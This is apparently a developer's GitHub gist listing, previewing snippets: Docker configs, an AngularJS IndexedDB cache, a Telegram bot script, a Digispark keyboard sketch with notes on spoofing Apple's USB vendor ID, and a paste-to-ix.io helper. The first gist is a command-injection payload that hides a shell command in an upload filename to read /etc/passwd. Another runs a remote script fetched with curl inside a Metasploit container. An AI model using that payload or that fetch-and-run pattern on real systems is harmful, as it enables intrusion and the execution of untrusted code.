Alex santaklouse
santaklouse
/ gist:cb6af87a5e6e67734f1c7c4c696a2b99
Created
May 15, 2019 12:47
PHP shell command injection tru upload file filename used in shell_exec
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| curl -F 'language=en' -F 'type=email' -F "[email protected]; filename=\"||test(){ $(echo $1 | python -c 'import sys, urllib as ul; print ul.unquote(sys.stdin.read())') ; };test cat%20%2fetc%2fpasswd > /tmp/1 ;.mp3\"" --compressed 'http://localhost/upload_file' |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| version: '3' | |
| services: | |
| app: | |
| container_name: app | |
| image: santaklouse/nassh-tor-relay | |
| ports: | |
| - '8022:8022' | |
| depends_on: | |
| - torproxy |
santaklouse
/ digispark.suilent_activity_emulator.ino
Last active
January 21, 2020 13:50
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #include "DigiKeyboard.h" | |
| /* | |
| You can also change vendor of device =) | |
| path ~/Library/Arduino15/packages/digistump/hardware/avr/1.6.7/libraries/DigisparkKeyboard/usbconfig.h | |
| Below there are values for Apple Keyboard | |
| #define USB_CFG_VENDOR_ID 0xac, 0x05 | |
| #define USB_CFG_DEVICE_ID 0x02, 0x02 | |
| #define USB_CFG_VENDOR_NAME 'A','p','p','l','e',' ','I','n','c','.' |
santaklouse
/ msf_update_and_run.sh
Last active
February 1, 2022 00:54
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/bin/bash | |
| echo '[+] Initializing local clock' | |
| ntpdate -B -q 0.debian.pool.ntp.org | |
| source /usr/local/rvm/scripts/rvm | |
| echo '[+] Initializing postgres' |
santaklouse
/ metasploit
Created
January 6, 2020 19:21
run msf container by one command with preupdate and
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| docker run --rm -it -p 4444:4444 -p 80:80 -p 8080:8080 -p 443:443 -p 445:445 -p 8081:8081 -v /tmp/msf:/tmp/data -v ~/tmp:/opt/tmp --entrypoint '/bin/bash' strm/metasploit -c "$(curl -fsSL https://gist.github.com/santaklouse/8148598825f272c6eabf6f1cc30c770b/raw)" |
santaklouse
/ youtube?.js
Created
January 20, 2020 14:19
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| document.cookie="VISITOR_INFO1_LIVE=oKckVSqvaGw; path=/; domain=.youtube.com"; | |
| window.location.reload(); |
santaklouse
/ indexed_db.service.js
Last active
February 26, 2020 14:01
draft for angularJs cache storage based on indexedDB
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| (function(angular){ | |
| 'use strict'; | |
| angular.module('test.services.indexed_db', []) | |
| .factory('CRC32', function () { | |
| let makeCRCTable = () => { | |
| let c, | |
| crcTable = [], | |
| n = 0; |
santaklouse
/ Dockerfile
Last active
March 26, 2020 23:39
Symfony 3: example of Scheduled emails workflow
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| ... | |
| #setup task scheduler cron job | |
| RUN (crontab -l ; echo "* * * * * $(which php) /srv/www/app/console ts:run >> /var/log/cron.log 2>&1") | crontab \ | |
| && touch /var/log/cron.log | |
| CMD ["cron", "-f"] |
santaklouse
/ gist:611b239b5e83cf3f81418b58e2dd8b70
Created
March 27, 2020 00:06
Save text from cli (get url like pastebin)
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| bash# command 2>&1 | curl -F 'f:1=<-' ix.io | |
| Or as function in .bashrc | |
| function pastebin() { curl -F -s 'f:1=<-' ix.io; } | |
| And | |
| # ps aux | pastebin |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/bin/sh | |
| API_TOKEN='TG_API_TOKEN' | |
| CHAT_ID='CHAT_ID' | |
| if [ -z "$CHAT_ID" ]; then | |
| echo 'Please, define CHAT_ID first! See "chat":{"id":xxxxxxx string below:' | |
| /usr/bin/wget -qO - https://api.telegram.org/bot$API_TOKEN/getUpdates | |
| exit 1 | |
| fi |